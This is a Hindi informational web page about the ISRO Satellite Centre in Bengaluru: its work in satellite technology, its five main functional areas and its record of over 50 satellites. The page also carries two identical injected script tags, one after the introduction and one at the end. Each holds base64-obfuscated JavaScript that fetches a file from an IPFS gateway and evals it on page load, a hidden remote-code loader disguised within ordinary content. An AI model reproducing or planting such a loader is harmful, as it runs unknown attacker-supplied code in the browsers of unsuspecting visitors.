इसरो उपग्रह केंद्र (आइज़ैक)
इसरो उपग्रह केंद्र (आईज़ैक) बेंगलोर में वैज्ञानिक, तकनीकी और अनुप्रयोज्य अभियानों के लिए उपग्रह प्रौद्योगिकी का विकास और उपग्रह प्रणालियों के कार्यान्वयन में कार्यरत है।
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
प्रमुख क्षेत्र
आईज़ैक कार्यरूप में पाँच प्रमुख क्षेत्रों में व्यवस्थित है-
- संरचनाएँ
- तापीय प्रणालियाँ और अंतरिक्ष-यान यांत्रिकी सहित यांत्रिक प्रणालियाँ
- डिजीटल प्रणालियाँ और संचार प्रणालियों सहित डिजीटल और संचार क्षेत्र
- अंतरिक्षयान जॉँच प्रणाली, प्रणाली समेकन और पॉवर प्रणाली से युक्त समेकन और पॉवर क्षेत्र
- नियंत्रण प्रणाली, अभियान विकास और कंप्यूटर तथा सूचना सहित नियंत्रण और अभियान क्षेत्र, और सुविधाएँ।
विश्वसनीयता और घटक क्षेत्र तथा कार्यक्रम योजना तथा मूल्यांकन समूह केंद्र को सम्बद्ध सहायता प्रदान करते हैं। परियोजना प्रबंधन दल इन्सैट और आई.आर.एस. परियोजनाओं के क्रियान्वयन में समन्वय करते हैं। अंतरिक्ष खगोल विज्ञान और यंत्रीकरण विभाग अंतरिक्ष विज्ञान गतिविधियों के कार्य में लगा है। एक विस्तृत कोडांतरण, परीक्षण तथा ताप-निर्वात कक्ष (सी.ए.टी.वी.ए.सी.) अंतरिक्ष पर्यावरण की आवश्यकताएँ पूरी करने के लिए उप-प्रणालियों और प्रणालियों की अर्हता हेतु अपेक्षित सहायता उपलब्ध कराते हैं।
उपलब्धियाँ
इसरो उपग्रह केंद्र की उपलब्धियों में अभी तक वैज्ञानिक, संचार और सुदूर संवेदन जैसे विभिन्न प्रकार के 50 से अधिक उपग्रहों का विन्यास और विकास सम्मिलित है।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>